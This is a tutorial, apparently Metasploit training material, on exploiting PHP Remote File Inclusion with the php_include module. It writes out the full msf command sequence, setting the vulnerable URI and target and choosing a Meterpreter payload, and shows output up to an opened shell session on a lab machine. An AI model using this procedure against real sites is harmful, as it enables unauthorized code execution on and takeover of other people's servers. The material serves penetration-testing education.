The Internet is littered with improperly coded web applications with multiple vulnerabilities being disclosed on a daily basis. One of the more critical vulnerabilities is Remote File Inclusion (RFI) that allows an attacker to force PHP code of his/her choosing to be executed by the remote site even though it is stored on a different site. Recently, Metasploit published not only a php_include module but also a PHP Meterpreter payload. The php_include module is very versatile as it can be used against any number of vulnerable webapps and is not product-specific.
In order to make use of the file inclusion exploit module, you will need to know the exact path to the vulnerable site. Loading the module in Metasploit, we can see a great number of options available to us.
msf > use exploit/unix/webapp/php_include msf exploit(php_include) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic
The most critical option to set in this particular module is the exact path to the vulnerable inclusion point. Where we would normally provide the URL to our PHP shell, we simply need to place the text "XXpathXX" and Metasploit will know to attack this particular point on the site.
msf exploit(php_include) > set PHPURI /rfi_me.php?path=XXpathXX PHPURI => /rfi_me.php?path=XXpathXX msf exploit(php_include) > set RHOST 192.168.1.150 RHOST => 192.168.1.150
In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload.
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp PAYLOAD => php/meterpreter/bind_tcp msf exploit(php_include) > exploit [*] Started bind handler [*] Using URL: http://0.0.0.0:8080/ehgqo4 [*] Local IP: http://192.168.1.101:8080/ehgqo4 [*] PHP include server started. [*] Sending stage (29382 bytes) to 192.168.1.150 [*] Meterpreter session 1 opened (192.168.1.101:56931 -> 192.168.1.150:4444) at 2010-08-21 14:35:51 -0600 meterpreter > sysinfo Computer: V-XPSP2-SPLOIT- OS : Windows NT V-XPSP2-SPLOIT- 5.1 build 2600 (Windows XP Professional Service Pack 2) i586 meterpreter >
Just like that, a whole new avenue of attack is opened up using Metasploit.